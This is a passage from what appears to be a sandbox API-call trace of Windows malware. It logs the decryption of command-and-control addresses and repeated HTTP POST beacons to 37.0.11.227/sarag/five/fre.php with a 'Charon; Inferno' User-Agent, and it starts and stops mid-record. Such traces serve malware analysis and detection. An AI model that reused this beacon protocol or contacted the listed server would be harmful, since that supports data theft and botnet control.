(lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0267.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0267.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.785] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0267.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.786] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0267.786] GetProcessHeap () returned 0x690000 [0267.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0267.786] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0267.786] GetProcessHeap () returned 0x690000 [0267.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0267.786] socket (af=2, type=1, protocol=6) returned 0x7e8 [0267.787] connect (s=0x7e8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0267.871] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0267.887] GetProcessHeap () returned 0x690000 [0267.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0267.888] GetProcessHeap () returned 0x690000 [0267.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0267.888] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.889] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.889] GetProcessHeap () returned 0x690000 [0267.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0267.889] GetProcessHeap () returned 0x690000 [0267.890] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.890] GetProcessHeap () returned 0x690000 [0267.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0267.890] GetProcessHeap () returned 0x690000 [0267.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0267.891] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.891] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.891] GetProcessHeap () returned 0x690000 [0267.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0267.895] GetProcessHeap () returned 0x690000 [0267.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.895] send (s=0x7e8, buf=0x6ad508*, len=242, flags=0) returned 242 [0267.896] send (s=0x7e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0267.896] GetProcessHeap () returned 0x690000 [0267.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0267.896] recv (in: s=0x7e8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0267.967] GetProcessHeap () returned 0x690000 [0267.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0267.968] GetProcessHeap () returned 0x690000 [0267.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0267.968] GetProcessHeap () returned 0x690000 [0267.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0267.969] GetProcessHeap () returned 0x690000 [0267.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0267.969] closesocket (s=0x7e8) returned 0 [0267.972] GetProcessHeap () returned 0x690000 [0267.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0267.972] GetProcessHeap () returned 0x690000 [0267.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.973] GetProcessHeap () returned 0x690000 [0267.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0267.973] GetProcessHeap () returned 0x690000 [0267.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0267.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15a0) returned 0x7e8 [0267.990] Sleep (dwMilliseconds=0xea60) [0267.991] GetProcessHeap () returned 0x690000 [0267.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0267.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.993] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.007] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0268.014] GetProcessHeap () returned 0x690000 [0268.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0268.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.015] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0268.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.016] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.017] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.017] GetProcessHeap () returned 0x690000 [0268.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0268.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.020] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0268.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.021] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0268.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.022] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0268.022] GetProcessHeap () returned 0x690000 [0268.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.023] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.023] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.024] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.025] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.025] GetProcessHeap () returned 0x690000 [0268.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0268.025] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.025] GetProcessHeap () returned 0x690000 [0268.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0268.026] GetProcessHeap () returned 0x690000 [0268.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0268.026] GetProcessHeap () returned 0x690000 [0268.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0268.026] GetProcessHeap () returned 0x690000 [0268.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0268.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.027] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.034] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0268.039] GetProcessHeap () returned 0x690000 [0268.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0268.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.040] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0268.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.041] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.041] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.041] GetProcessHeap () returned 0x690000 [0268.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0268.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.043] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0268.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.044] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0268.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.045] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0268.045] GetProcessHeap () returned 0x690000 [0268.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.046] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0268.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.047] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0268.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.048] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0268.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.049] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0268.049] GetProcessHeap () returned 0x690000 [0268.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0268.049] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0268.049] GetProcessHeap () returned 0x690000 [0268.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0268.049] socket (af=2, type=1, protocol=6) returned 0x7ec [0268.148] connect (s=0x7ec, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0268.178] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0268.178] GetProcessHeap () returned 0x690000 [0268.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0268.179] GetProcessHeap () returned 0x690000 [0268.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0268.181] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.182] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.182] GetProcessHeap () returned 0x690000 [0268.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0268.182] GetProcessHeap () returned 0x690000 [0268.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.185] GetProcessHeap () returned 0x690000 [0268.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0268.185] GetProcessHeap () returned 0x690000 [0268.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0268.186] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.186] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.186] GetProcessHeap () returned 0x690000 [0268.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0268.187] GetProcessHeap () returned 0x690000 [0268.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.187] send (s=0x7ec, buf=0x6ad508*, len=242, flags=0) returned 242 [0268.187] send (s=0x7ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0268.187] GetProcessHeap () returned 0x690000 [0268.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0268.187] recv (in: s=0x7ec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0268.271] GetProcessHeap () returned 0x690000 [0268.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0268.272] GetProcessHeap () returned 0x690000 [0268.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0268.272] GetProcessHeap () returned 0x690000 [0268.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0268.273] GetProcessHeap () returned 0x690000 [0268.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0268.273] closesocket (s=0x7ec) returned 0 [0268.273] GetProcessHeap () returned 0x690000 [0268.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0268.273] GetProcessHeap () returned 0x690000 [0268.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0268.274] GetProcessHeap () returned 0x690000 [0268.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0268.274] GetProcessHeap () returned 0x690000 [0268.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0268.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15a4) returned 0x7ec [0268.277] Sleep (dwMilliseconds=0xea60) [0268.278] GetProcessHeap () returned 0x690000 [0268.278] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0268.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.286] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0268.292] GetProcessHeap () returned 0x690000 [0268.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0268.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.293] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0268.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.294] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.295] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.295] GetProcessHeap () returned 0x690000 [0268.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0268.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.301] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0268.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.302] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0268.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.303] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0268.303] GetProcessHeap () returned 0x690000 [0268.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.304] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.305] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.306] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.306] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.306] GetProcessHeap () returned 0x690000 [0268.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0268.307] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.307] GetProcessHeap () returned 0x690000 [0268.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0268.307] GetProcessHeap () returned 0x690000 [0268.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0268.308] GetProcessHeap () returned 0x690000 [0268.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0268.308] GetProcessHeap () returned 0x690000 [0268.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0268.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.309] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.314] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0268.318] GetProcessHeap () returned 0x690000 [0268.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0268.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.320] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0268.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.320] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.321] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.321] GetProcessHeap () returned 0x690000 [0268.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0268.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.323] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0268.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.324] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0268.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.324] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0268.324] GetProcessHeap () returned 0x690000 [0268.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.325] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0268.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.326] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0268.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.327] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0268.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.328] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0268.328] GetProcessHeap () returned 0x690000 [0268.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0268.328] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0268.328] GetProcessHeap () returned 0x690000 [0268.328] 